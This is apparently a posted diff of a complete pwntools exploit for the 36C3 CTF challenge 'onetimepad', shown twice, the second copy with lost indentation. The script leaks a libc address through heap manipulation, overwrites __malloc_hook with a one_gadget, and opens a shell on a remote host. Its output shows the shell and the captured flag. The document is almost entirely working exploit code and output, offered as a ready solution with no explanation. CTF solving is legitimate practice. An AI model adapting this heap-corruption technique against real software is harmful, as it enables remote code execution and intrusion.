soez · December 30, 2019 08:37
diff --git a/36C3CTF-onetimepad.py b/36C3CTF-onetimepad.py
 # coding: utf-8
 from pwn import *

 def menu(s):
 	io.recvuntil("> ")
 	io.sendline(s)

 def write(s):
 	menu("w")
 	io.sendline(s)

 def read(n, r=False):
 	menu("r")
 	io.sendline(str(n))
 	if r: return u64(io.recv(6).ljust(8, '\0'))

 def rewrite(n, s):
 	menu("e")
 	io.sendline(str(n))
 	io.sendline(s)

 local = True
 elf = ELF("./onetimepad")
 libc = ELF("./libc-2.28.so")
 env = {"LD_PRELOAD" : libc.path}
 io = process(elf.path, env=env) if local else remote("88.198.154.140", 31336)
 write("A"*0x610) # 0
 write("A"*0x560) # 1
 write("A"*0x20)  # 2
 write("A"*0x20)  # 3
 read(1)
 read(3)
 read(2)
 rewrite(2, "") # null byte in fd
 write("A"*0x20)  # 1
 write("A"*0x20)  # 2
 write("A"*0x4e0) # 3
 read(3)
 main_arena = read(2, True)
 print "[+] main_arena: 0x%08x" % main_arena
 libc.address = main_arena - 0x1bbca0
 one_gadget = libc.address + 0xe5456
 print "[+] libc_base: 0x%08x" % libc.address
 malloc_hook = libc.symbols['__malloc_hook']
 print "[+] __malloc_hook: 0x%08x" % malloc_hook
 print "[+] one_gadget: 0x%08x" % one_gadget
 write("A"*0x4e0) # 2
 write(p64(malloc_hook - (0x70 - 0x6))) # 3
 write("A"*0x70) # 4
 write("A"*(0x70 - 0x6) + p64(one_gadget)) # 5
 write("") # trigger
 io.interactive()

 '''
 [+] Opening connection to 88.198.154.140 on port 31336: Done
 [+] main_arena: 0x7f35fdef9ca0
 [+] libc_base: 0x7f35fdd3e000
 [+] __free_hook: 0x7f35fdef9c30
 [+] one_gadget: 0x7f35fde23456
 [*] Switching to interactive mode
 $ id
 uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
 $ ls
 flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
 onetimepad
 $ cat flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
 hxp{HsIuUU__g-will-5e1f-d3s7rUct-af7er-R3adlnG}
 '''
	# coding: utf-8
	from pwn import *

	def menu(s):
	io.recvuntil("> ")
	io.sendline(s)

	def write(s):
	menu("w")
	io.sendline(s)

	def read(n, r=False):
	menu("r")
	io.sendline(str(n))
	if r: return u64(io.recv(6).ljust(8, '\0'))

	def rewrite(n, s):
	menu("e")
	io.sendline(str(n))
	io.sendline(s)

	local = True
	elf = ELF("./onetimepad")
	libc = ELF("./libc-2.28.so")
	env = {"LD_PRELOAD" : libc.path}
	io = process(elf.path, env=env) if local else remote("88.198.154.140", 31336)
	write("A"*0x610) # 0
	write("A"*0x560) # 1
	write("A"*0x20) # 2
	write("A"*0x20) # 3
	read(1)
	read(3)
	read(2)
	rewrite(2, "") # null byte in fd
	write("A"*0x20) # 1
	write("A"*0x20) # 2
	write("A"*0x4e0) # 3
	read(3)
	main_arena = read(2, True)
	print "[+] main_arena: 0x%08x" % main_arena
	libc.address = main_arena - 0x1bbca0
	one_gadget = libc.address + 0xe5456
	print "[+] libc_base: 0x%08x" % libc.address
	malloc_hook = libc.symbols['__malloc_hook']
	print "[+] __malloc_hook: 0x%08x" % malloc_hook
	print "[+] one_gadget: 0x%08x" % one_gadget
	write("A"*0x4e0) # 2
	write(p64(malloc_hook - (0x70 - 0x6))) # 3
	write("A"*0x70) # 4
	write("A"*(0x70 - 0x6) + p64(one_gadget)) # 5
	write("") # trigger
	io.interactive()

	'''
	[+] Opening connection to 88.198.154.140 on port 31336: Done
	[+] main_arena: 0x7f35fdef9ca0
	[+] libc_base: 0x7f35fdd3e000
	[+] __free_hook: 0x7f35fdef9c30
	[+] one_gadget: 0x7f35fde23456
	[*] Switching to interactive mode
	$ id
	uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
	$ ls
	flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
	onetimepad
	$ cat flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
	hxp{HsIuUU__g-will-5e1f-d3s7rUct-af7er-R3adlnG}
	'''